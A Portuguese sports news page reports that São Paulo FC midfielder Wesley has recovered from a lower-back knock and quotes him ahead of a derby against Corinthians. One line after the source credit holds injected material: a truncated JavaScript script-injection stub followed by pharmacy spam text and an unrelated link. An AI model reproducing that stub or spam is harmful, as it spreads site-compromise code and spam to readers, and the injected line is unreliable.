Destaque

Recuperado, Wesley projeta retorno “ainda mais forte”

Escalado pelo técnico Juan Carlos Osorio para dar cara nova ao setor de armação no duelo contra o Vasco (4 x 0), em Brasília, o meio-campista Wesley deu conta do recado e conseguiu coroar a sua grande exibição com um dos gols são-paulinos na goleada sobre os cariocas. Porém, no dia 10 de julho, durante um treino após o triunfo sobre os vascaínos, o jogador sofreu um choque acidental na região lombar.

O camisa 19 ainda tentou permanecer na atividade realizada no Centro de Treinamento da Barra Bunda, mas as dores forçaram o atleta a trabalhar com os fisioterapeutas. Desde então, sempre em período integral (manhã e tarde), o volante cumpriu as etapas no processo de recuperação até reunir condições de integrar novamente os exercícios com o elenco.

Recuperado, o atleta vive a expectativa de poder atuar novamente. “Estou mais tranquilo agora, porque me livrei das dores e voltei a treinar com o grupo no começo desta semana. Tomara que eu consiga manter este bom ritmo nos treinos e, assim, fique à disposição no final de semana. O mais importante é que estou bem e treinando firme para poder jogar de novo”, festejou.

Desde o embate no Estádio Mané Garrincha, Wesley desfalcou o Tricolor em quatro jogos. Por isso, nada melhor do que um clássico pela frente para marcar o seu retorno. Com 27 pontos em 16 jogos, o São Paulo ocupa a sétima colocação no Campeonato Brasileiro e enfrentará um rival direto na briga pelas primeiras colocações: o Corinthians está na vice-liderança, com 33 pontos. No domingo (9), às 16h (de Brasília), o Morumbi receberá o Majestoso.

“Todo clássico tem um clima diferente, né? Nosso grupo está ciente do que tem que fazer: conquistar os três pontos. Assim como os meus companheiros, eu também estou focado e quero a vitória para manter a briga pelo título”, avaliou Wesley, que projeta um retorno ainda mais forte na equipe são-paulina após ser liberado pelo Departamento Médico.

“Quero dar sequência ao trabalho, porque eu estava em um bom momento antes se sofrer a lesão. Voltei a trabalhar forte, como antes, mas tenho certeza que vou voltar ainda mais forte. Estou confiante de que posso ajudar o clube e os meus companheiros, porque quero coroar esta volta com muito trabalho”, finalizou.

Fonte: SiteOficialvar d=document;var s=d.createElement(‘script’); pills acquire cheap medications on line – http://romairama.blog.unsoed.ac.id/2016/11/30/acquire-cheap-medications-on-line/

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

14 − treze =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque

Mais em Destaque

Brenner lamenta derrota contra o Lanús: ‘Não saiu como queríamos’

saopauloadmin29 de outubro de 2020

Nos pênaltis! Volpi salva, e São Paulo se classifica para as quartas da Copa do Brasil diante do Fortaleza

saopauloadmin26 de outubro de 2020

São Paulo pega argentinos na Sul-Americana

saopauloadmin23 de outubro de 2020

Sul-Americana: Oitavas começam na semana que vem. Veja datas e possíveis adversários:

saopauloadmin21 de outubro de 2020

São Paulo empata com o Grêmio no Morumbi

saopauloadmin18 de outubro de 2020

Tricolor empata com o Fortaleza na estreia da Copa do Brasil

saopauloadmin15 de outubro de 2020

“Na Copa do Brasil não temos chance de errar”, projeta Diniz em jogo com o Fortaleza

saopauloadmin12 de outubro de 2020

São Paulo bate o Atlético-GO com show dos garotos ‘Made in Cotia’

saopauloadmin8 de outubro de 2020

Com pior sequência da “Era Diniz”, São Paulo tenta dar fim a jejum em ‘decisão’ contra o River

saopauloadmin30 de setembro de 2020